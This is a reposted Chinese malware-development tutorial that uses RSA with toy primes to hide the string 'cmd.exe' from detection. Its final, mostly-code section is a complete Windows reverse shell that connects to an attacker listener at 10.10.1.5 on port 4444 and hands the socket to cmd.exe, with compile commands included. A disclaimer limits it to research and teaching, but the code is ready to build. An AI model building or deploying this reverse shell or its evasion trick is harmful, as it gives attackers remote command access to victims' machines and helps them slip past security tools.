【MalDev-16】应用质数和模算法

admin
admin
admin
131485
文章
107
评论
2025年1月6日09:27:05评论2 views字数 8051阅读26分50秒阅读模式

02-应用质数和模算法

生成RSA加密密钥

密钥生成时先选择两个素数p和q,计算他们的乘积n=p*q,RSA的安全性是基于从n推导出p和q是很困难的,p和q越大,在给定n推到p和q的值越难,简单逻辑如下:

1-选择两个大的素数

2-计算n和phi(欧拉商函数)

3-选择一个公共指数e

4-计算私有指数d

5-使用公钥加密信息

6-使用私钥解密信息

#include<stdio.h>
#include<stdlib.h>
#include<math.h>

// 判断一个数是不是素数 Function to check if a number is prime
intis_prime(int n){
if (n <= 1) {
return0;
  }
for (int i = 2; i <= sqrt(n); i++) {
if (n % i == 0) {
return0;
    }
  }
return1;
}

// 计算两个数的最大公约数 Function to find the greatest common divisor (GCD) of two numbers
intgcd(int a, int b){
while (b != 0) {
int temp = b;
    b = a % b;
    a = temp;
  }
return a;
}

// 找到一个数e,使得1 < e < phi并且gcd(e, phi) = 1 Function to find a number e such that 1 < e < phi and gcd(e, phi) = 1
intfind_public_exponent(int phi){
int e = 2;
while (e < phi) {
if (gcd(e, phi) == 1) {
return e;
    }
    e++;
  }
return-1// Error: Unable to find public exponent
}

// Function to find the modular multiplicative inverse of a number
intmod_inverse(int a, int m){
for (int x = 1; x < m; x++) {
if ((a * x) % m == 1) {
return x;
    }
  }
return-1// Error: Modular inverse does not exist
}

// Function to perform modular exponentiation
intmod_pow(int base, int exp, int mod){
int result = 1;
while (exp > 0) {
if (exp % 2 == 1) {
      result = (result * base) % mod;
    }
    base = (base * base) % mod;
    exp /= 2;
  }
return result;
}

intmain(){
// Step 1: Choose two large prime numbers
int p = 61;
int q = 53;

// Step 2: Compute n (modulus) and phi (Euler's totient function)
int n = p * q;
int phi = (p - 1) * (q - 1);

// Step 3: Choose a public exponent e
int e = find_public_exponent(phi);

if (e == -1) {
printf("Error: Unable to find public exponent.n");
return1;
  }

// Step 4: Compute the private exponent d
int d = mod_inverse(e, phi);

if (d == -1) {
printf("Error: Unable to compute private exponent.n");
return1;
  }

// Display public and private keys
printf("Public Key (n, e): (%d, %d)n", n, e);
printf("Private Key (n, d): (%d, %d)n", n, d);

// Step 5: Encrypt a message using the public key
int plaintext = 42;
int ciphertext = mod_pow(plaintext, e, n);
printf("Encrypted Message: %dn", ciphertext);

// Step 6: Decrypt the message using the private key
int decrypted_message = mod_pow(ciphertext, d, n);
printf("Decrypted Message: %dn", decrypted_message);

return0;
}

编译

x86_64-w64-mingw32-gcc -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

运行

PS C:UsersadminDownloads> .hack.exe
Public Key(n, e): (32337)
Private Key (n, d): (32331783)
Encrypted Message: 240
Decrypted Message: 42

加解密字符串cmd.exe

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<math.h>

// Function to check if a number is prime
intis_prime(int n){
if (n <= 1) {
return0;
  }
for (int i = 2; i <= sqrt(n); i++) {
if (n % i == 0) {
return0;
    }
  }
return1;
}

// Function to find the greatest common divisor (GCD) of two numbers
intgcd(int a, int b){
while (b != 0) {
int temp = b;
    b = a % b;
    a = temp;
  }
return a;
}

// Function to find a number e such that 1 < e < phi and gcd(e, phi) = 1
intfind_public_exponent(int phi){
int e = 2;
while (e < phi) {
if (gcd(e, phi) == 1) {
return e;
    }
    e++;
  }
return-1// Error: Unable to find public exponent
}

// Function to find the modular multiplicative inverse of a number
intmod_inverse(int a, int m){
for (int x = 1; x < m; x++) {
if ((a * x) % m == 1) {
return x;
    }
  }
return-1// Error: Modular inverse does not exist
}

// Function to perform modular exponentiation
intmod_pow(int base, int exp, int mod){
int result = 1;
while (exp > 0) {
if (exp % 2 == 1) {
      result = (result * base) % mod;
    }
    base = (base * base) % mod;
    exp /= 2;
  }
return result;
}

// Function to encrypt a message
voidencrypt(constunsignedchar *message, int message_len, int e, int n, int *ciphertext){
for (int i = 0; i < message_len; i++) {
    ciphertext[i] = mod_pow(message[i], e, n);
  }
}

// Function to decrypt a ciphertext
voiddecrypt(constint *ciphertext, int message_len, int d, int n, unsignedchar *decrypted_message){
for (int i = 0; i < message_len; i++) {
    decrypted_message[i] = (unsignedchar)mod_pow(ciphertext[i], d, n);
  }
}

intmain(){
// Step 1: Choose two large prime numbers
int p = 61;
int q = 53;

// Step 2: Compute n (modulus) and phi (Euler's totient function)
int n = p * q;
int phi = (p - 1) * (q - 1);

// Step 3: Choose a public exponent e
int e = find_public_exponent(phi);

if (e == -1) {
printf("Error: Unable to find public exponent.n");
return1;
  }

// Step 4: Compute the private exponent d
int d = mod_inverse(e, phi);

if (d == -1) {
printf("Error: Unable to compute private exponent.n");
return1;
  }

// Display public and private keys
printf("Public Key (n, e): (%d, %d)n", n, e);
printf("Private Key (n, d): (%d, %d)n", n, d);

// Message to be encrypted
constunsignedchar original_message[] = "cmd.exe";
int message_len = sizeof((constchar *)original_message);

// Array to store ciphertext
int ciphertext[message_len];

// Encrypt the message
encrypt(original_message, message_len, e, n, ciphertext);

// Display encrypted message
printf("encrypted Message: ");
for (int i = 0; i < message_len; i++) {
printf("%d ", ciphertext[i]);
  }
printf("n");

// Array to store decrypted message
unsignedchar decrypted_message[message_len];

// Decrypt the message
decrypt(ciphertext, message_len, d, n, decrypted_message);

// Display decrypted message
printf("decrypted Message: %sn", decrypted_message);

return0;
}

编译

x86_64-w64-mingw32-gcc -O2 hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

运行

PS C:UsersadminDownloads> .hack2.exe
Public Key(n, e): (32337)
Private Key (n, d): (32331783)
encrypted Message: 245972872113730715530710
decrypted Message: cmd.exe

加密反弹shell里的cmd.exe字符串

#include<winsock2.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<math.h>

// Function to check if a number is prime
intis_prime(int n){
if (n <= 1) {
return0;
  }
for (int i = 2; i <= sqrt(n); i++) {
if (n % i == 0) {
return0;
    }
  }
return1;
}

// Function to find the greatest common divisor (GCD) of two numbers
intgcd(int a, int b){
while (b != 0) {
int temp = b;
    b = a % b;
    a = temp;
  }
return a;
}

// Function to find a number e such that 1 < e < phi and gcd(e, phi) = 1
intfind_public_exponent(int phi){
int e = 2;
while (e < phi) {
if (gcd(e, phi) == 1) {
return e;
    }
    e++;
  }
return-1// Error: Unable to find public exponent
}

// Function to find the modular multiplicative inverse of a number
intmod_inverse(int a, int m){
for (int x = 1; x < m; x++) {
if ((a * x) % m == 1) {
return x;
    }
  }
return-1// Error: Modular inverse does not exist
}

// Function to perform modular exponentiation
intmod_pow(int base, int exp, int mod){
int result = 1;
while (exp > 0) {
if (exp % 2 == 1) {
      result = (result * base) % mod;
    }
    base = (base * base) % mod;
    exp /= 2;
  }
return result;
}

// Function to decrypt a ciphertext
voiddecrypt(constint *ciphertext, int message_len, int d, int n, unsignedchar *decrypted_message){
for (int i = 0; i < message_len; i++) {
    decrypted_message[i] = (unsignedchar)mod_pow(ciphertext[i], d, n);
  }
}

intmain(){
// Step 1: Choose two large prime numbers
int p = 61;
int q = 53;

// Step 2: Compute n (modulus) and phi (Euler's totient function)
int n = p * q;
int phi = (p - 1) * (q - 1);

// Step 3: Choose a public exponent e
int e = find_public_exponent(phi);

if (e == -1) {
printf("Error: Unable to find public exponent.n");
return1;
  }

// Step 4: Compute the private exponent d
int d = mod_inverse(e, phi);

if (d == -1) {
printf("Error: Unable to compute private exponent.n");
return1;
  }

// Display public and private keys
printf("Public Key (n, e): (%d, %d)n", n, e);
printf("Private Key (n, d): (%d, %d)n", n, d);

int message_len = 8;

// encrypted message (cmd.exe string)
int ciphertext[] = {24,597,2872,1137,3071,55,3071,0};

// array to store decrypted string
unsignedchar decrypted_cmd[message_len];

// Decrypt the message
decrypt(ciphertext, message_len, d, n, decrypted_cmd);

  WSADATA wsaData;
  SOCKET wSock;
structsockaddr_in hax;
  STARTUPINFO sui;
  PROCESS_INFORMATION pi;

// listener ip, port on attacker's machine
char *ip = "10.10.1.5";
short port = 4444;

// init socket lib
WSAStartup(MAKEWORD(22), &wsaData);

// create socket
  wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL00);

  hax.sin_family = AF_INET;
  hax.sin_port = htons(port);
  hax.sin_addr.s_addr = inet_addr(ip);

// connect to remote host
WSAConnect(wSock, (SOCKADDR *)&hax, sizeof(hax), NULLNULLNULLNULL);

memset(&sui, 0sizeof(sui));
  sui.cb = sizeof(sui);
  sui.dwFlags = STARTF_USESTDHANDLES;
  sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)wSock;

// start the decoded command with redirected streams
CreateProcess(NULL, decrypted_cmd, NULLNULL, TRUE, 0NULLNULL, &sui, &pi);
exit(0);

return0;
}

编译

x86_64-w64-mingw32-gcc -O2 hack3.c -o hack3.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -lws2_32
【MalDev-16】应用质数和模算法
【MalDev-16】应用质数和模算法
配套实验环境和电子书加Q拉群下载
【MalDev-16】应用质数和模算法

原文始发于微信公众号(高级红队专家):【MalDev-16】应用质数和模算法

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月6日09:27:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【MalDev-16】应用质数和模算法https://cn-sec.com/archives/3594794.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息